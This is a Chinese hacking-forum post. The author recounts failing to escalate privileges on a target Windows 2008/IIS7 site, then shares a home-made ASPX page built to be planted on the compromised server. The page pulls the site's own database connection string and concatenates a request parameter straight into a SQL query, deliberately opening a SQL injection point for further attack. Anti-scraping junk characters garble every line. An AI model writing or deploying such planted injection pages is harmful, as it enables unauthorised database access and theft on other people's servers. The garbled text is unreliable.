昨天跟4z1看一个站点,提权很难提,看了整整5个小时,无果。 2008+iis7,无sa,无root,无各种服务。。。
3 b1 f% k6 s7 [, H其实中用到了aspx构造注射来跨站,网上找了一堆代码,没一个能用的。
7 c* T: [& A: Y2 _8 ^# m6 j D0 j% J代码量不多,自己写个拉倒了。烦死了。
5 ^* m: r: ?' h7 L# L
5 v4 ]- X2 Y2 d, H1 F! R6 n8 |4 i& F- h0 S3 m" x# R7 S `5 D% f
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
" M* W: g) v. ]* X% I<html xmlns="http://www.w3.org/1999/xhtml">5 t& p; s: U& x1 a, |2 y6 \
<head runat="server">
, y& P! ]$ L* E1 }9 q# } <title>暗影aspx构造注射专用页面</title>
8 @4 I( y0 j+ R/ `4 D: _% T+ D X</head>
. Y& p% \8 {# A, l8 m<body>
$ g& l6 g% c+ c8 U# |0 \, `1 w <form id="form1" runat="server">( D1 H, i* g5 m# ^# l- C2 l$ C8 i
<div>
6 }' ], `/ N0 R/ u4 C4 N/ U <script language="c#" runat="server">
: w& `5 w, o2 n
( q1 w9 T* o# N' w% p void page_init(object sender, EventArgs e)' \9 M: @1 F5 [. L; x# h
{
0 _% h1 Y2 K# v, T
6 B: A& o0 K2 ?3 z; u: { System.Data.SqlClient.SqlConnection conn = new System.Data.SqlClient.SqlConnection();
' U* C. B! c! W% u; L/ S2 b$ B Q7 @ 7 w3 e, R) d5 S8 U
conn.ConnectionString = ConfigurationManager.ConnectionStrings["连接名"].ToString();
* I7 }" w% [2 \' h/ W; M conn.Open();
- \* e# p& T! w& ?; r0 e0 S# X& J
( j$ ^' S9 C/ W: t, @2 v3 l string i = this.Page.Request.Params["xxser"]; //这里是参数?xxser=1
9 w3 @/ ]: R/ o8 @4 x ; `6 \2 ~, Z" z5 b$ T4 o* A: o, k
System.Data.SqlClient.SqlCommand command = new System.Data.SqlClient.SqlCommand("select * from [表] where 列名= " + i, conn);
; Y5 ~1 D: {* S, c int x = command.ExecuteNonQuery();' g. ?8 D/ ?3 F% ?/ T' l
Response.Write(i+"\n");
5 i6 X3 f C& B6 C# [ Response.Write(x);
% P5 t) c0 U% f l7 I1 P. L$ d. t conn.Close();
$ P! m7 q0 `( ? }
# P# z- V7 O" B B6 t
: T4 C3 M2 a4 Q' F' t </script>8 `# _! d# p( j) D" }2 ?
</div>2 X& O/ n7 C7 K4 |
</form>9 C# v o- q5 S2 D( N' x% _1 K
</body>
. T' t! m( G7 C C& c H) T</html>+ G) K; i3 q. H) H9 K0 q! T! i
|